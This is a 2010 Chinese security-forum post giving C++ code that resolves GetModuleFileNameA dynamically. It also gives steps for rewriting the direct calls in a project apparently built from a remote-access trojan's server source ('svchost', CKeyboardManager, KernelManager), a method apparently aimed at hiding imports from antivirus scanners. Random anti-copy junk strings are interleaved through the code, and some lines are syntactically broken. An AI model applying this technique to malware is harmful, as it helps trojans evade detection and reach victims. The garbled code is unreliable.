标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
5 u. ]# e" B0 l+ S) T, E: s5 v
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
4 s3 S0 y$ T; M& D, [3 |. U
----------------------------------------
% \+ I4 _- `( L
DTDY.h:
! {6 R+ `5 ?+ O( p
5 S# k& m3 l7 h3 ^2 a% d
#if _MSC_VER>1000
& Q$ J# m. K# X6 y" d7 e% a7 a6 I
#pragma once
' i( E X& z( a% H8 R0 W& A# \5 K
#endif //_MSC_VER>1000
) t; o7 o1 `# b% f
#include<windows.h>
! n6 ~% {9 G( D& o
+ C, }% b* `5 ^% j7 ^
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
/ J4 |0 c6 u, K
class DTDY
/ D" ?% j' Q2 t$ j" {
{
; _3 ^" q4 ~; Y
public:
) n8 i5 K" L2 m8 l* M# w% R
DTDY();
/ T- V0 l2 U0 K, q) h
virtual ~DTDY();
0 v7 I1 i! n+ o( s- ?- d
public:
' k: y7 A9 a$ h* [, |* i( n4 h
static pGetModuleFileNameA MyGetModuleFileName;
" ~0 D% {; S6 q, n
static BOOL FunInitiallization();
7 ^& F) W/ c! I/ L
};
, J- f2 F9 f8 N
#endif
5 R+ j+ k8 {) d: i# M
----------------------------------------
) E# }% s) {: |7 P# m/ d
/ d* ~8 L' r/ O
DTDY.cpp:
( l8 G) N/ ~* N5 T1 K
Z3 [. w& y# F+ j6 |& ^) U
#include "DTDY.h"
6 |9 @, w; J$ \
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
$ E" `8 p& q6 z" r- {. o3 [' G; M5 O
DTDY:TDY()
, K% x5 C$ [5 o0 W/ | U0 p9 ~6 B
{
& {# v2 d1 ^+ U/ p. I1 v0 g
}
) Q! L g& D8 m; k
DTDY::~DTDY()
* P- [5 O# O# }
{
( w" Y% y; H/ {! [
}
+ h8 }! ?; L; U' S* G& `
BOOL DTDY::FunInitiallization()
% s4 W1 `- q* r& |/ |# X6 R
{
8 _2 [+ ^2 _4 i6 r' H
HMODULE hModule=LoadLibrary("kernel32.dll");
* j% `* L8 C0 A$ Z# ?& _# o
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
% t, c* j$ R: d' S5 H6 N, A( u3 R
if(!MyGetModuleFileName=) return FALSE;
$ o! K" N4 s: h( {: b1 ^8 X
6 r5 r* Y2 X# y- W
return TRUE;
% N# ^" \) O( t( B
}
! l! _% h2 z+ f: a! S
----------------------------------------
7 U/ C }1 o8 \9 p: Z% c
svchost.cpp:
0 W: _/ K, E9 _
g2 q, i$ u- I1 X$ m% F
#include "DTDY.h"
$ L& X1 k- `% l0 P8 ? Q- t
; }7 j$ i. l9 d/ b
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
4 ^$ }# }! p; C. ^) @3 q0 A/ r- n2 c
{
. |9 _0 h- O7 K9 c8 ~
switch(ul_reason_for_call)
) ^7 ~% a9 E0 @+ S5 O# D @7 F
{
% P3 y1 y7 U0 v2 G' h3 q |
case DLL_PROCESS_ATTACH:
+ M3 ^: i: G& A) a
if(!DTDY::FunInitiallization()) return FALSE;
7 I. [( i- \2 N. i
+ ]' i, H% d. z4 x, k2 ~. {6 W9 p
break;
2 ~" d6 L9 Z$ P9 ]
}
8 d6 L6 [; O2 K" s8 r6 ?* P9 E- N
}
+ P C' Q) i. |' Z
' n/ C/ U0 d) c! A; _8 X9 g
8 {9 q5 l g d* n+ D+ s% j- A
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
( n& B7 a! M# i1 R) }# \
改写为
0 V8 y; j- H3 n- K+ O2 ]; O
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
4 U1 m- X" M, M% f$ {# H. w: d% q3 e
----------------------------------------
/ Z9 @1 c: h) ^1 ~9 K9 |3 z4 B
KernelManager.cpp:
b. K- ^! Y/ M2 A7 d4 S! T
2 m8 C/ @) ?/ R/ p% Y5 M3 ]
#include "../DTDY.h"
" x) w! w, s6 e7 y7 a, l, v& g
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
) h3 b" ]: J' i! e) M
改写为
& t' J9 @% i6 W) r {! T A ?3 ~6 R
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
$ y7 H Q' c6 i7 d! B4 O5 c
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
